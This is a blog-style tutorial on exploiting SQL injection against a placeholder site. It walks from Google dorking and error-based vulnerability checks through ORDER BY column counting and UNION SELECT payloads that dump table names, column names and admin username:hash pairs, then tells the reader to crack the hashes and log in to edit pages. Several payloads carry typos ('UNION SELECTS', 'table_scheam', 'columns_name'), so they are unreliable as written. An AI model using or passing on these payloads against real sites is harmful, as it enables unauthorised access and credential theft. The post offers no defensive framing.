Today i will explain the SQL injection. Input based attack is most
effective for testing web security. And the SQL is most popular for web
hacking. No wait, Let's start(Hey, i am not going to explain what is SQL
injection; it is how to exploit).
Testing if the target is vulnerable :
Suppose the target site is http://www.victim.com. We can quickly gather
some information by Google for finding some parameters based URL. Simply
if go to google and search like :
site:www.victim.com filetype:php
(Note: I think you already gathered some information against the site . So you know what is their file extension . If you are attacking randomly then go away from here.)
Then we see many result like:
www.victim.com/index.php
www.victim.com/something.php?id=3
etc
Simply browse the www.victim.com/something.php?id=3 and add one more thing ' . Example:
www.victim.com/something.php?id=3'
If the site is vulnerable then we will see SQL error like:
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '' AND products.obsolete='N'' at line 1
If we see this error on that page then we are confirm the site is vulnerable and exploitable.
Next ATTACK
Finding the columns Number:
First we will check that how column is available by "ORDER BY" query. If
we reach the more than available columns then we will get error
"Unknown Column".
No error:
www.victim.com/something.php?id=3 ORDER BY 4--
No error:
www.victim.com/something.php?id=3 ORDER BY 5--
Error:
www.victim.com/something.php?id=3 ORDER BY 6--
Now we are confirm that it has 6 columns . If you get no error then try more columns 7,8,9 etc.
How to find the Vulnerable column
To find the Vulnerable columns we need "UNION SELECT" command. So:
www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,5,6--
Now we will see 1-6(Anyone or multiple) number on pages. Suppose we see it is "5"
So now we know the column number 5 is vulnerable.
Checking the MySQL version :
www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,@@version,6--
We know the MySQL version is 5(version 4 won't work).
Great ! now We quickly need their Users database dump. So quick !!!
Now we need the all tables name
Getting Tables Name
www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_scheam=database()--
So we get several tables name. For example we get :
links
pages
tokens
visitor
creditcard
userstransaction
etc...
We want to logging as a powerful user so that we can edit their pages. To do this first we need to find out columns name:
Getting Columns name:
www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(columns_name),6 from information_schema.tables where table_name=users--
So from this query we get output like :
id
username
firstname
lastname
password
link
It is simply understandable that we need username and password columns for getting admin access:
Grabbing The username and password:
www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(username,0x3a,password),6 from users--
So you get output all username and password like, admin:akde3d09kd4ur489deqa9094ldad48dkr
super:54ee3d09kd4ur489deqa9094ldad4u78l
Now crack the hash and then logging with username "admin" or "super" and plain text(Cracked).
If you don't know how to crack hash check out other articles...
There are many sql injection technique .... but I explained here which is very common. So try more , research and research.
I hope there are some mistake i made... If you can catch them then feel free to contact me..
Good Luck!!!
Tidak ada komentar:
Posting Komentar